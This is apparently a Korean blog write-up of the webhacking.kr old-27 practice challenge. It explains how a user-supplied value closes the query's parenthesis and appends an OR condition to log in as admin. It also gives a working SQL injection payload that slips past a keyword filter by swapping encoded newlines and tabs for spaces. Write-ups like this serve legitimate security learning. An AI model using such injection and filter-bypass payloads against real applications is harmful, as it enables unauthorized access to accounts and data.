반응형
안녕하세요??
자운대 고라니입니다.
오늘은 wargame.kr old-27번 문제를 풀어보겠습니다.
문제의 첫 화면은 그냥 SQL INJECIOTN을 해보라고 나와있다.
일단 vuew-source를 활용하여 코드를 확인하였다.
소스코드에서 중요한 부분을 캡처하였다.
간단한 INJECTION을 통해서 admin으로 로그인할 수 있을 거라 생각했다.
"select id from chall27 where id='guest' and no=({$_GET['no']})"
여기서 id='guest' and no=X 룰 FALSE로 만들고 ||, or을 사용하여서 뒤에 TRUE문을 만들어 주면 간단히 풀리는 문제이다.
나는 $_GET['no']에 "3)||no=2-- " 라는 값을 넣을 예정이다.
select id from chall27 where id='guest' and no=(3)||no=2-- )
-> select id from chall27 where no=2
여기서 preg_match가 걸려있으므로 이를 url을 통해서 필터링해준다.
"3)||no=2-- " -> "3)%7C%7Cno%0alike%0a2--%09"
이 값을 넣으면 문제가 풀린다.
처음 푸는 사람이라면 score가 올라갈 것이다.
솔직히 푸는데 오래 걸린 문제이다.
어려운 건 아닌데 나는 --%0a도 주석처리가 될 것이라고 생각하였으나, 알고 보니 안됐었다.
3)%7C%7Cno%0alike%0a2--%0a 를 계속 넣어서 삽질하였다. ㅠㅠ
반응형
'category > 웹해킹(webhacking.kr)' 카테고리의 다른 글
웹해킹(webhacking.kr) - 8번 (0) | 2023.02.14 |
---|---|
웹해킹(webhacking.kr) - 35번 (0) | 2020.11.30 |
웹해킹(webhacking.kr) - 40번 (0) | 2020.11.26 |
webhacking 기본 (0) | 2020.11.24 |
웹해킹(webhacking.kr) - 24번 (0) | 2020.11.21 |
웹해킹(webhacking.kr) - 16번 (0) | 2020.11.21 |
웹해킹(webhacking.kr) - 50번 (0) | 2020.11.21 |
웹해킹(webhacking.kr) - 45번 (0) | 2020.11.20 |
댓글